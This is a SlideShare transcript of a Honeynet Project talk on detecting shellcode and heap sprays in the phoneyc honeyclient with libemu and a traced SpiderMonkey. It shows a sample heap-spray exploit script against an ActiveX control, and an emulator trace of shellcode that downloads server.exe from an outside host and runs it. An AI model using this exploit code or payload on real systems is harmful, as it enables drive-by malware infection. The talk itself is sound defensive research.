Your SlideShare is downloading. ×
0
phoneyc with
   libemu

   Z. Chen

phoneyc

WB Malware         .
                                                        ...
Contents
phoneyc with
   libemu            .
   Z. Chen
                   ..
                    1    Introduction to pho...
Contents
phoneyc with
   libemu            .
   Z. Chen
                   ..
                    1    Introduction to pho...
Introduction to phoneyc
phoneyc with
   libemu

   Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS             http://cod...
Contents
phoneyc with
   libemu            .
   Z. Chen
                   ..
                    1    Introduction to pho...
A Typical Heapspray Mal-javascript I
phoneyc with
   libemu
                    1 <body>
   Z. Chen
                      ...
A Typical Heapspray Mal-javascript II
phoneyc with
   libemu             memory = new Array();
   Z. Chen
                ...
Heap Status After Heapspray
phoneyc with
   libemu

   Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS
Basic Principles
 ...
Detecting Shellcode/Heapspray
phoneyc with
   libemu

   Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS
Basic Principles...
Contents
phoneyc with
   libemu            .
   Z. Chen
                   ..
                    1    Introduction to pho...
Introduction to libemu
phoneyc with
   libemu

   Z. Chen
                    .
phoneyc             From it’s official site:...
Detecting x86 Instructions
phoneyc with
   libemu

   Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS
Basic Principles

S...
Contents
phoneyc with
   libemu            .
   Z. Chen
                   ..
                    1    Introduction to pho...
Introduction to spidermonkey
phoneyc with
   libemu

   Z. Chen

phoneyc

WB Malware

Libemu
                    .
Tracing...
Basic Principles of Spidermonkey
phoneyc with
   libemu

   Z. Chen

phoneyc

WB Malware

Libemu
                       Al...
Contents
phoneyc with
   libemu            .
   Z. Chen
                   ..
                    1    Introduction to pho...
Basic Idea
phoneyc with
   libemu

   Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS
                   As both the shel...
Details I
phoneyc with
   libemu

   Z. Chen
                     The following js codes:
phoneyc
                     fun...
Details
phoneyc with
   libemu

   Z. Chen

phoneyc
                   To do so, we need to:
WB Malware

Libemu           ...
Related Source files to be used later
phoneyc with
   libemu

   Z. Chen

phoneyc

WB Malware

Libemu
                     ...
Implementation
phoneyc with
   libemu

   Z. Chen             Register a trace handler into spidermonkey using
phoneyc
   ...
Contents
phoneyc with
   libemu            .
   Z. Chen
                   ..
                    1    Introduction to pho...
Basic Idea
phoneyc with
   libemu

   Z. Chen

phoneyc

WB Malware

Libemu              .
Tracing JS          Heapspray   ...
Basic Idea
phoneyc with
   libemu

   Z. Chen

phoneyc             .
                    Heapspray                        ...
Contents
phoneyc with
   libemu            .
   Z. Chen
                   ..
                    1    Introduction to pho...
A Run on ssreader 0day.html I
phoneyc with
   libemu               joyan@Jdeb:˜/code/phoneyc$ sh go.sh
   Z. Chen         ...
A Run on ssreader 0day.html II
phoneyc with
   libemu

   Z. Chen
                        c:WINDOWSsystem32a.exe
phoneyc
 ...
Analysis of The Shellcode using libemu I
phoneyc with
   libemu               FARPROC WINAPI GetProcAddress (
   Z. Chen  ...
Analysis of The Shellcode using libemu II
phoneyc with
   libemu                        none;
   Z. Chen                  ...
Analysis of The Shellcode using libemu III
phoneyc with
   libemu

   Z. Chen
                           LPUNKNOWN pCaller...
phoneyc with
   libemu

   Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS
                    .
                        ...
Upcoming SlideShare
Loading in...5
×

Shellcode and heapspray detection in phoneyc

1,305

Published on

Published in: Technology, Art & Photos
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,305
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
52
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

Transcript of "Shellcode and heapspray detection in phoneyc"

  1. 1. phoneyc with libemu Z. Chen phoneyc WB Malware . . Libemu Shellcode and heapspray detection in phoneyc Tracing JS . .. . . Basic Principles SCDetection Basic Idea Details Zhijie Chen1 Source Files Implementation 1 Honeynet Project Chinese Chapter HS Detection Current Results Honeynet Project on Google Summer of Code, 2009 JoYAN . . . . . .
  2. 2. Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 2
  3. 3. Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 3
  4. 4. Introduction to phoneyc phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS http://code.google.com/p/phoneyc/ Basic Principles SCDetection A python honeyclient Basic Idea Details Original written by Jose Nazario. Source Files Implementation To detect Web-based Malware HS Detection Current Results JoYAN 4
  5. 5. Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 5
  6. 6. A Typical Heapspray Mal-javascript I phoneyc with libemu 1 <body> Z. Chen <script>window.onerror=function(){return true;}</script> phoneyc <object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" style=’display:none’ id=’target’></object> WB Malware <SCRIPT language="javascript"> Libemu 6 var shellcode = unescape("%u9090"+"%u9090"+ Tracing JS ...(shellcode) Basic Principles "%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61%u2f65%u6573%u7672 SCDetection Basic Idea %u7265%u652e%u6578%u0000"); Details </script> Source Files Implementation <SCRIPT language="javascript"> HS Detection 11 var bigblock = unescape("%u9090%u9090"); Current var headersize = 20; Results var slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); 16 block = bigblock.substring(0, bigblock.length−slackspace); while(block.length+slackspace<0x40000) JoYAN block = block+block+fillblock; 6
  7. 7. A Typical Heapspray Mal-javascript II phoneyc with libemu memory = new Array(); Z. Chen for (x=0; x<100; x++) memory[x] = block +shellcode; 21 var buffer = ’’; phoneyc while (buffer.length < 1024) buffer+="x05"; WB Malware var ok="1111"; Libemu target.Register(ok,buffer); Tracing JS </script> Basic Principles 26 </body> SCDetection Basic Idea Details Source Files Implementation HS Detection Current Results JoYAN 7
  8. 8. Heap Status After Heapspray phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS Basic Principles | More than ??MB 0x90(NOP)s or some other x86 instructions SCDetection Basic Idea as a sledge | Shellcode | Details Source Files Implementation HS Detection Current Results JoYAN 8
  9. 9. Detecting Shellcode/Heapspray phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS Basic Principles SCDetection SC/HS Detecting Tool: How To Detect It? Basic Idea Details Source Files Implementation HS Detection Current Results JoYAN 9
  10. 10. Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 10
  11. 11. Introduction to libemu phoneyc with libemu Z. Chen . phoneyc From it’s official site: . WB Malware .. libemu is a small library written in c offering basic x86 Libemu emulation and shellcode detection using GetPC heuristics. Tracing JS Basic Principles Using libemu one can: SCDetection Basic Idea detect shellcodes Details Source Files execute the shellcodes Implementation HS Detection . profile shellcode behaviour .. . . Current Results Using libemu to detect shellcode and heapspray in web-based malware: ¡¡Defending browsers against drive-by downloads: Mitigating heap-spraying code injection attacks¿¿) JoYAN 11
  12. 12. Detecting x86 Instructions phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS Basic Principles SCDetection SC/HS Detecting Time: When To Detect It? Basic Idea Details Source Files Implementation HS Detection Current Results JoYAN 12
  13. 13. Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 13
  14. 14. Introduction to spidermonkey phoneyc with libemu Z. Chen phoneyc WB Malware Libemu . Tracing JS What is SpiderMonkey? . Basic Principles .. SCDetection SpiderMonkey is the code-name for the Mozilla’s C Basic Idea Details implementation of Source Files Implementation JavaScript.(http://www.mozilla.org/js/spidermonkey/) . .. . . HS Detection Current Results JoYAN 14
  15. 15. Basic Principles of Spidermonkey phoneyc with libemu Z. Chen phoneyc WB Malware Libemu All the javascript sources are compiled into js bytecodes. Tracing JS Basic Principles There is an interpreter who interprets the bytecodes and SCDetection Basic Idea do certain simple actions. Details Source Files All the javascript variables are stored as jsval. Implementation HS Detection Some of the values are store as an “atom”, such as strings. Current Results JoYAN 15
  16. 16. Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 16
  17. 17. Basic Idea phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS As both the shellcode manipulation and the spraying of the Basic Principles fillblock involve assignments. The shellcode will be detected SCDetection Basic Idea immediately on it’s assignment if we are able to interrupt Details Source Files spidermonkey at the interpretion of certain bytecodes related to Implementation an assignment and check its argments and values for shellcodes. HS Detection Current Results JoYAN 17
  18. 18. Details I phoneyc with libemu Z. Chen The following js codes: phoneyc function a(){b="c"; var a = 0;} WB Malware Libemu are compiled into bytecodes like: Tracing JS Basic Principles 00000: bindname "b" SCDetection 00003: string "c" Basic Idea 00006: setname "b" Details Source Files 4 00009: pop Implementation 00010: zero HS Detection 00011: setvar 0 Current 00014: pop Results 00015: stop So, if we examine the set* opcodes’ arguments on the top of the stack in runtime, shellcodes won’t get passed! JoYAN 18
  19. 19. Details phoneyc with libemu Z. Chen phoneyc To do so, we need to: WB Malware Libemu Step trace the spidermonkey runtime. Tracing JS Stop at the key bytecodes (such as setname, setvar, Basic Principles SCDetection setprop, setarg etc.) on all kinds of Basic Idea Details assignments.Unfortunately different assignments have Source Files Implementation different bytecode accordingly. HS Detection But all the opcodes related to assignments share a Current JOF SET bit in their opcode description Results structure(./src/jsopcode.h). JoYAN 19
  20. 20. Related Source files to be used later phoneyc with libemu Z. Chen phoneyc WB Malware Libemu jsapi.h:Basic APIs for javascript execution. Tracing JS Basic Principles jsdbgapi.h:Basic APIs for debugging spidermonkey. SCDetection Basic Idea jsopcode.tbl:All the js opcodes(bytecodes). Details Source Files Implementation jsinterp.c:You can find how each bytecode is interpreted HS Detection here. Current Results JoYAN 20
  21. 21. Implementation phoneyc with libemu Z. Chen Register a trace handler into spidermonkey using phoneyc JS SetInterrupt. This handler will be called at each step WB Malware of the bytecode execution. Libemu In the handler: Tracing JS Use JS GetTrapOpcode to get current Basic Principles opcode(bytecode). SCDetection Basic Idea Use JS FrameIterator to get current runtime stack. Details Check the rvalue of the set* bytecodes on the top of the Source Files Implementation stack with libemu. HS Detection Dump the shellcodes and alert. Current Contine the execution. Results Privide this traced js virtual as a python module named honeyjs, so other part of phoneyc can use this module just the same as python-spidermonkey with optional awareness of the extra shellcode/heapspray detection APIs. JoYAN 21
  22. 22. Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 22
  23. 23. Basic Idea phoneyc with libemu Z. Chen phoneyc WB Malware Libemu . Tracing JS Heapspray . Basic Principles .. A myriad of NOP-like x86 instructions SCDetection Basic Idea Details Accumulating through a loop of assignments Source Files Implementation . Shellcode in the end of each sledge .. . . HS Detection Current Results JoYAN 23
  24. 24. Basic Idea phoneyc with libemu Z. Chen phoneyc . Heapspray . WB Malware .. Libemu A myriad of NOP-like x86 instructions Tracing JS Accumulating through a loop of assignments Basic Principles SCDetection . Shellcode in the end of each sledge .. . . Basic Idea Details Source Files . Implementation Detection . .. HS Detection Now: A variable counter to record the mal-assignments Current Results (assignments containing shellcode in the r-value). . In the future: entropy ? the nozzle way? .. . . JoYAN 24
  25. 25. Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 25
  26. 26. A Run on ssreader 0day.html I phoneyc with libemu joyan@Jdeb:˜/code/phoneyc$ sh go.sh Z. Chen 2 HONEYCLIENT MODULE TEST fetching http://172.31.25.227/phoneyc/ssreader 0day.html phoneyc [] WB Malware ==> http://172.31.25.227/phoneyc/ssreader 0day.html Libemu JS EVAL Tracing JS 7 Executing Javascript: Basic Principles DEBUG: !!!SC DETECTED at 141847268=141847572size:374 SCDetection DEBUG: !!!SC DETECTED at 141847524=141847756size:32728 Basic Idea Details DEBUG: !!!SC DETECTED at 141723488=141847756size:32728 Source Files Implementation DEBUG: !!!SC DETECTED at 141723488=141847756size:32728 HS Detection 12 ... Current Results DEBUG: !!!SC DETECTED at 141723488=141847756size:32728 SSReader Pdg2 Register method overflow 17 [ALERT] 0: 141847268 −> Shellcode Detected HIT: 1 Runing shellcode... offset:248 JoYAN DEBUG: Begin analyzing ... DEBUG: download http://1v1.name/server.exe −> 26
  27. 27. A Run on ssreader 0day.html II phoneyc with libemu Z. Chen c:WINDOWSsystem32a.exe phoneyc 22 WB Malware ... Libemu Tracing JS URLs:[’http://1v1.name/server.exe’, ’http://1v1.name/server. Basic Principles exe’] SCDetection Done Basic Idea Details 27 [ALERT] 0: 141847524 −> Shellcode Detected HIT: 1 Source Files [ALERT] 0: 141723488 −> Shellcode & Potential heapspray sledge HIT: Implementation 100 HS Detection VBS EVAL IFRAMES [] Current Results HREFS [] FRAMES [] 32 IMAGES [] JoYAN 27
  28. 28. Analysis of The Shellcode using libemu I phoneyc with libemu FARPROC WINAPI GetProcAddress ( Z. Chen HMODULE hModule = 0x7c800000 => 3 none; phoneyc LPCSTR lpProcName = 0x0041710c => WB Malware = "GetSystemDirectoryA"; Libemu ) = 0x7c814eea; Tracing JS FARPROC WINAPI GetProcAddress ( Basic Principles 8 HMODULE hModule = 0x7c800000 => SCDetection none; Basic Idea Details LPCSTR lpProcName = 0x00417120 => Source Files Implementation = "WinExec"; HS Detection ) = 0x7c86136d; Current 13 FARPROC WINAPI GetProcAddress ( Results HMODULE hModule = 0x7c800000 => none; LPCSTR lpProcName = 0x00417128 => = "ExitThread"; 18 ) = 0x7c80c058; JoYAN FARPROC WINAPI GetProcAddress ( HMODULE hModule = 0x7c800000 => 28
  29. 29. Analysis of The Shellcode using libemu II phoneyc with libemu none; Z. Chen LPCSTR lpProcName = 0x00417133 => 23 = "LoadLibraryA"; phoneyc ) = 0x7c801d77; WB Malware HMODULE LoadLibraryA ( Libemu LPCTSTR lpFileName = 0x00417140 => Tracing JS = "urlmon"; Basic Principles 28 ) = 0x7df20000; SCDetection FARPROC WINAPI GetProcAddress ( Basic Idea Details HMODULE hModule = 0x7df20000 => Source Files none; Implementation LPCSTR lpProcName = 0x00417147 => HS Detection 33 = "URLDownloadToFileA"; Current ) = 0x7df7b0bb; Results UINT GetSystemDirectory ( LPTSTR lpBuffer = 0x0012fe5f => none; 38 UINT uSize = 32; ) = 19; JoYAN HRESULT URLDownloadToFile ( 29
  30. 30. Analysis of The Shellcode using libemu III phoneyc with libemu Z. Chen LPUNKNOWN pCaller = 0x00000000 => phoneyc none; WB Malware 43 LPCTSTR szURL = 0x0041715a => Libemu = "http://1v1.name/server.exe"; Tracing JS LPCTSTR szFileName = 0x0012fe5f => Basic Principles = "c:WINDOWSsystem32a.exe"; SCDetection DWORD dwReserved = 0; Basic Idea Details 48 LPBINDSTATUSCALLBACK lpfnCB = 0; Source Files ) = 0; Implementation UINT WINAPI WinExec ( HS Detection LPCSTR lpCmdLine = 0x0012fe58 => Current Results = "cmd /c c:WINDOWSsystem32a.exe"; 53 UINT uCmdShow = 0; ) = 32; JoYAN 30
  31. 31. phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS . Thank you! . Basic Principles SCDetection Basic Idea Details .. .. . . Source Files Implementation HS Detection Current Results JoYAN 31
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×